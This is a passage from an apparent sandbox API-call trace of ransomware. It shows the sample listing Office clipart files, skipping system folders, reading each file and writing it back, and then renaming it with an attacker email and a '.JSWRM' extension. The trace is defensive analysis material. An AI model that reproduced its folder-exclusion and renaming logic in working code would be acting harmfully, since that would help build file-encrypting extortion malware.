lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x380, lpOverlapped=0x0) returned 1 [0077.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.559] WriteFile (in: hFile=0x314, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x380, lpOverlapped=0x0) returned 1 [0077.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0077.559] CloseHandle (hObject=0x314) returned 1 [0077.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0077.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0077.559] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0077.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0077.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0077.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0077.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.559] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00564_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00564_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0077.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0077.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0077.560] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00586_.WMF", cAlternateFileName="")) returned 1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2=".") returned 1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="..") returned 1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="...") returned 1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="windows") returned -1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="recovery") returned -1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="perflogs") returned -1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="documents and settings") returned 1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="system volume information") returned -1 [0077.560] lstrcmpiW (lpString1="FD00586_.WMF", lpString2="msocache") returned -1 [0077.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0077.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00586_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00586_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00586_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0077.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0077.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00586_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00586_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00586_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0077.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0077.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0077.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.641] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=752) returned 1 [0077.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f0) returned 0x20b1f8 [0077.641] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2f0, lpOverlapped=0x0) returned 1 [0077.644] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.645] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2f0, lpOverlapped=0x0) returned 1 [0077.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0077.645] CloseHandle (hObject=0x314) returned 1 [0077.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0077.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0077.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0077.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0077.645] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0077.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0077.645] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.645] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00586_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00586_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0077.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0077.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.646] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00775_.WMF", cAlternateFileName="")) returned 1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2=".") returned 1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="..") returned 1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="...") returned 1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="windows") returned -1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="recovery") returned -1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="perflogs") returned -1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="documents and settings") returned 1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="system volume information") returned -1 [0077.646] lstrcmpiW (lpString1="FD00775_.WMF", lpString2="msocache") returned -1 [0077.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0077.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00775_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00775_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00775_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0077.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0077.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00775_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00775_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00775_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0077.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0077.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0077.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.647] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11152) returned 1 [0077.647] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24d210 [0077.647] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2b90, lpOverlapped=0x0) returned 1 [0077.651] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.651] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2b90, lpOverlapped=0x0) returned 1 [0077.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.652] CloseHandle (hObject=0x314) returned 1 [0077.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0077.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0077.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0077.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0077.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0077.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0077.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0077.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0077.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0077.653] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2332, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00779_.WMF", cAlternateFileName="")) returned 1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2=".") returned 1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="..") returned 1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="...") returned 1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="windows") returned -1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="recovery") returned -1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="perflogs") returned -1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="documents and settings") returned 1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="system volume information") returned -1 [0077.653] lstrcmpiW (lpString1="FD00779_.WMF", lpString2="msocache") returned -1 [0077.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0077.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00779_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00779_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00779_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0077.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0077.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00779_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00779_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00779_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0077.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0077.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0077.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0077.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.654] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9010) returned 1 [0077.654] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2330) returned 0x24d210 [0077.654] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2330, lpOverlapped=0x0) returned 1 [0077.659] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.659] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2330, lpOverlapped=0x0) returned 1 [0077.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.659] CloseHandle (hObject=0x314) returned 1 [0077.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0077.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0077.659] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: 